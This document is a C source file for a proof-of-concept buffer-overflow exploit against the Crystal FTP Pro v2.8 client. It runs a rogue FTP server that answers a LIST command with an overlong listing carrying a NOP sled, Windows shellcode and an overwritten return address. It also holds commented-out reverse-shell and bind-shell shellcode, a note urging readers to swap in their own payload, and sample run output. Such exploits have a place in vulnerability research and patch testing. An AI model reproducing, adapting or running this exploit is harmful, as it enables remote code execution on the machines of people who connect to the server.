/*
12/23/2004
NOTES: -this piece of code is supposed to be PoC !
-Target Buffer Size: 328-68-4 is about 254 bytes
-RET Addr Space: 0x0012f496 to 0x0012f594

Sending 327 bytes to the client will appen NULL byte to RET-ADDR
thus allowing us to jmp to 0x0012f496 and exec arbitrary code.
Insert some tiny shellcode instead of that POP-UP-107-BYTE-CODE !

-Suggestions? Mail me! cybertronic gmx net
Greetz fly to my girlfriend YASMIN H.

? ¼M
M ¼MMM
MMm ¼MMMM
M$$MMm ¼MMMMM.
MM$$MMMMm MMMMMMMM
`MM$$MMMMMMm 4MMMM$$MM
MMM$$MMMMMMMMm ´MMMM$$MMM
MMM$$$MMMMMMMMm mMMMM$MMMM
`MMM$$$MMMMMMMm MMMM$MMMM? MMMM$$$MMMMMMMm MMM$$MMM? `MMMMMMMMMMMMMm MMMMMMM? `MMMMMMMMMMMMMm MMMMMM
`MMMMMMMMMMMM MMMMM
`MMMMMMMMMM MMMMM
`MMMMMMMMMMMM
MMMMMMMMMMM
mmMMMMMMMMMMMMMMMMM
mmMMMMMMMMMMMMMMMMMMMMMM
¼MMM#MMMMMMMMMMMMMMMMMMMMm
4MMM<?>MMMMMMMMMMMMMMMMMMMM
MMMMMm_ mMMMMMMMMMMMMMMMMMMMM
4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMM
¼Mn ¼MMMMMMMMMMMMMMMMMMMMMMMMM ¼Mnn
nM `MMMMMMMMMMMMMMMMMMMMMM? n? `? MMMMMMMMMMMMMMMMM? n? MMMMMM? mtr?

mMMM nmM mM
mM¼´ M ' M n
mM$ nM n¼MMn¼Ä
4M m ¼M N ? ¼`
m? `n? mM NM? NM
mM mMm nm M´¼Mļ n¼Mm ¼n xn? ? ¼n xn? ¼Mm Mn n? nM
nMm
mM `mMM? nM M nM ,` ¼n? y M ¼n? y nM ? nM ? ? ? M? M' ¼Ä M n.,? nm nM nM n M ? ? ? n
MM? mM M nM ? M? n , nM ¼Ä nM M nM M M M? M
n
MMM? M? nM MÄÄM n¼nN ¼M nM ¼M `¼M? ´¼ .N nM ¼nM? M? n? cybertronic 2oo5
? ________________
----------------------/

MMMMMMMMm mMMMMMMM? ´MM$MMMMMMMMMm mMMMMMMMMM$MM`
MMMMMMMMMMMMMMMm mMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMM
`MMMMMMMMMMMMMMMMMM MMMMMMMMMMM(c)MMMM?
ºÕÍÄúú just want to say love you dad! úúÄÍÕº

---snip---

cybertronic@ctronic:~/poc> gcc -o crystal_expl crystal_expl.c
cybertronic@ctronic:~/poc> ./crystal_expl 192.168.2.101

### # # ### ### ### ### ### ### # # # ###
# # # # # # # # # # # # # ## # # #
# # # ### ### ### # ### # # # # # # #
# # # # # # # # # # # # # ## # #
### # ### ### # # # # # ### # # # ###
cybertronic gmx net
----------(c) 2005----------

Crystal FTP Pro v2.8 PoC

[*] Creating socket...OK!
[*] Listening...OK!
[*] Local IP: 192.168.2.101
[*] Incomming connection from: 192.168.2.102
[*] Sending Welcome Message...OK!
[*] Getting Login Information
--> Reading USER...OK!
--> Reading PASS...OK!
USER LOGGED IN!
[*] Proceeding...
--> Reading cmd...OK!
--> Reading cmd...OK!
--> Reading cmd...OK!
[*] Entering Passive Mode...
[*] Creating socket...OK!
[*] Listening...OK!
[*] Passive connection established!
--> Reading cmd...OK!
[*] User is trying to use "LIST" command
[*] Creating bad packet...OK!
[*] Sending bad packet [328 bytes]...OK!
[*] Confirming...OK!
--> Reading cmd...FAILED! [client crashed]

cybertronic@ctronic:~/poc>

---snip---

*/

#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>

#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"

#define PORT 1337
#define PASV 31337
#define BACKLOG 5

/*
//335 bytes
unsigned char reverseshell[] =
"\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa"
"\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2"
"\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e"
"\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64"
"\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57"
"\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a"
"\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8"
"\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90"
"\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57"
"\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68\xc0\xa8\x00\xf7\x68\x02"
"\x00\x22\x11\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44"
"\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe"
"\x44\x24\x3d\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d"
"\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00"
"\x51\xff\x55\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24"
"\x57\xff\x55\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b"
"\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb"
"\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0"
"\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b"
"\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b"
"\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";

//356 bytes
unsigned char bindshell[] =
"\xe8\x38\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xe5\x49\x86"
"\x49\xa4\xad\x2e\xe9\xa4\x1a\x70\xc7\xd9\x09\xf5\xad\xcb\xed\xfc"
"\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2\x73\xad\xd9\x05\xce\x72\xfe\xb3"
"\x16\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c\x4c\x00\x01\x5b\x54\x89"
"\xe5\x89\x5d\x00\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x58\x08\xeb\x0c\x8d\x57\x2c\x51\x52\xff\xd0\x89\xc3\x59"
"\xeb\x10\x6a\x08\x5e\x01\xee\x6a\x0a\x59\x8b\x7d\x00\x80\xf9\x06"
"\x74\xe4\x51\x53\xff\x34\x8f\xe8\x90\x00\x00\x00\x59\x89\x04\x8e"
"\xe2\xeb\x31\xff\x66\x81\xec\x90\x01\x54\x68\x01\x01\x00\x00\xff"
"\x55\x20\x57\x57\x57\x57\x47\x57\x47\x57\xff\x55\x1c\x89\xc3\x31"
"\xff\x57\x57\x68\x02\x00\x22\x11\x89\xe6\x6a\x10\x56\x53\xff\x55"
"\x18\x57\x53\xff\x55\x14\x57\x56\x53\xff\x55\x10\x89\xc2\x66\x81"
"\xec\x54\x00\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\x89\xd7\xc6"
"\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x7c\x24\x48\x89\x7c\x24\x4c"
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
"\x51\x51\xff\x75\x00\x51\xff\x55\x30\x89\xe1\x68\xff\xff\xff\xff"
"\xff\x31\xff\x55\x2c\x57\xff\x55\x0c\xff\x55\x28\x53\x55\x56\x57"
"\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18"
"\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc"
"\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c"
"\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c"
"\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d"
"\x5b\xc2\x08\x00";
*/

//107 bytes [ Addresses WinXP Pro SP2 ]
char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb"
"\x77\x1d\x80\x7c" //LoadLibraryA kernel32.dll
"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb"
"\x28\xac\x80\x7c" //GetProcAddress kernel32.dll
"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51\x51"
"\x52\xff\xd0\x31\xd2\x50\xb8"
"\xa2\xca\x81\x7c" //ExitProcess kernel32.dll
"\xff\xd0\xe8\xc4\xff\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64"
"\x6c\x6c\x4e\xe8\xc2\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65"
"\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff\xff\x48\x65\x79\x4e";

void auth ( int s );
void header ();
void handle_cmd ( int s, int connfd, char* ip );
char* get_cmd ( int s );
int isip ( char* ip );

int
main ( int argc, char* argv[] )
{
int listenfd, connfd;
char* ip;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;

if ( argc != 2 )
{
printf ( RED "[!] Usage: %s LOCAL_IP\n" NORMAL, argv[0] );
exit ( 1 );
}
if ( isip ( argv[1] ) != 0 )
{
printf ( RED "[!] Enter Valid IP\n" NORMAL );
exit ( 1 );
}
system ( "clear" );
header ();
printf ( "[*] Creating socket..." );
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );

bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr )
);
printf ( "[*] Listening..." );
if ( listen ( listenfd, BACKLOG ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );

for ( ; ; )
{
clilen = sizeof ( cliaddr );

if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr,
&clilen
) ) < 0 )
{
close ( listenfd );
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}

if ( ( childpid = fork ( ) ) == 0 )
{
close ( listenfd );
ip = ( char* ) ( argv[1] );
printf ( "[*] Local IP: %s\n", ip );
printf ( "[*]" GREEN " Incomming connection from:\t %s\n" NORMAL,
inet_ntoa ( cliaddr.sin_addr ) );
auth ( connfd );
handle_cmd ( connfd, ( int ) NULL, ip );
}
close ( connfd );
}
}

int
isip ( char* ip )
{
unsigned int a, b, c, d;

sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d );
if ( a < 1 || a > 255 )
return ( 1 );
if ( b < 0 || b > 255 )
return ( 1 );
if ( c < 0 || c > 255 )
return ( 1 );
if ( d < 0 || d > 255 )
return ( 1 );
return ( 0 );
}

void
auth ( int s )
{
char user[32], pass[32], out[128];

printf ( "[*] Sending Welcome Message..." );
bzero ( &out, 128 );
strcpy ( out, "220 cybertronicFTP v0.2\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\t!!! ERROR: AUTHORIZATION FAILED !!!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
printf ( "[*] Getting Login Information\n" );
printf ( YELLOW "--> Reading USER..." NORMAL );
sleep ( 1 );
if ( read ( s, user, 32 ) <= 0 )
{
printf ( RED "FAILED\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
sleep ( 1 );
bzero ( &out, 128 );
strcpy ( out, "331 Anonymous FTP server, send password though.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\t!!! ERROR: AUTHORIZATION FAILED !!!\n" NORMAL );
exit ( 1 );
}
printf ( YELLOW "--> Reading PASS..." NORMAL );
sleep ( 1 );
if ( read ( s, pass, 32 ) <= 0 )
{
printf ( RED "FAILED\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
sleep ( 1 );
bzero ( &out, 128 );
strcpy ( out, "230 Login successful!\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\t!!! ERROR: AUTHORIZATION FAILED !!!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN " USER LOGGED IN!\n" NORMAL );
printf ( "[*] Proceeding...\n" );
}

void
handle_cmd ( int s, int s2, char* ip )
{

int listenfd, connfd;
int i = 1;
int tmp[4];
char* a = NULL;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
char out[128], evil[512], addr[32];
char* cmd;;
unsigned long offset1 = 0xdeadc0de;
unsigned long offset2 = 0x12f504de;

while ( 1 )
{
cmd = get_cmd ( s );
if ( strncmp ( cmd, "PWD", 3 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "257 \"/\" is current directory.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "!!! ERROR: COMMAND HANDLING FAILED !!!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "CWD", 3 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "257 \"/\" is current directory.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "!!! ERROR: COMMAND HANDLING FAILED !!!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "TYPE", 4 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "200 Type set to A..\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "!!! ERROR: COMMAND HANDLING FAILED !!!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "PASV", 4 ) == 0 )
{
bzero ( &addr, 32 );
a = (char*)strtok ( ip, "." );
tmp[0] = (int)a;
while ( a != NULL)
{
a = (char*)strtok ( NULL, "." );
tmp[i] = (int)a;
i++;
}
bzero ( &out, 128 );
sprintf( out, "227 Entering Passive Mode.
(%s,%s,%s,%s,122,105).\r\n",
tmp[0], tmp[1], tmp[2], tmp[3] );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "!!! ERROR: COMMAND HANDLING FAILED !!!\n" NORMAL );
exit ( 1 );
}
printf ( "[*] Entering Passive Mode...\n" );
printf ( "[*] Creating socket..." );
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PASV );

bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr
) );
printf ( "[*] Listening..." );
if ( listen ( listenfd, 1 ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
clilen = sizeof ( cliaddr );

if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr,
&clilen ) ) < 0 )
{
close ( listenfd );
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
close ( listenfd );
printf ( "[*]" GREEN " Passive connection established!\n" );
handle_cmd ( s, connfd, addr );
}
else if ( strncmp ( cmd, "LIST", 4 ) == 0 )
{
printf ( "[*]" GREEN " User is trying to use \"LIST\" command\n"
NORMAL
);
printf ( "[*] Creating bad packet..." );
//this will overwrite EIP with 0xdeadc0de
//bzero ( &evil, 512 );
//strcpy ( evil, "-rw-r--r-- 29 Dec 22
13:37
cybertronic." );
//memset ( evil+68, 'A', 254 );
//strncat ( evil, ( unsigned char * ) &offset1, 4 );
//strcat ( evil, "\r\n" );
bzero ( &evil, 512 );
strcpy ( evil, "-rw-r--r-- 29 Dec 22
13:37
cybertronic." );
memset ( evil+68, 0x90, 146 );
strcat ( evil, code );
strncat ( evil, ( unsigned char * ) &offset2, 4 );
strcat ( evil, "\r\n" );
printf ( GREEN "OK!\n" NORMAL );
bzero ( &out, 128 );
strcpy ( out, "150 Here comes the directory listing.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "FAILED!" NORMAL);
exit ( 1 );
}
printf ( "[*] Sending bad packet [%i bytes]...", strlen ( evil ) );
if ( write ( s2, evil, strlen ( evil ) ) <= 0 )
{
printf ( RED "FAILED!" NORMAL);
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL);
bzero ( &out, 128 );
strcpy ( out, "226 Transfer ok\r\n" );
printf ( "[*] Confirming..." );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "FAILED!" NORMAL);
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL);
close ( s2 );
}
else
{
bzero ( &out, 128 );
strcpy ( out, "550 UNKNOWN COMMAND\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "!!! ERROR: COMMAND HANDLING FAILED !!!\n" NORMAL );
exit ( 1 );
}
}
}
}

char*
get_cmd ( int s )
{
static char cmd[32];
printf ( YELLOW "--> Reading cmd..." NORMAL );
if ( read ( s, cmd, 32 ) <= 0 )
{
printf ( RED "FAILED! [client crashed]\n" NORMAL);
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
return ( cmd );
}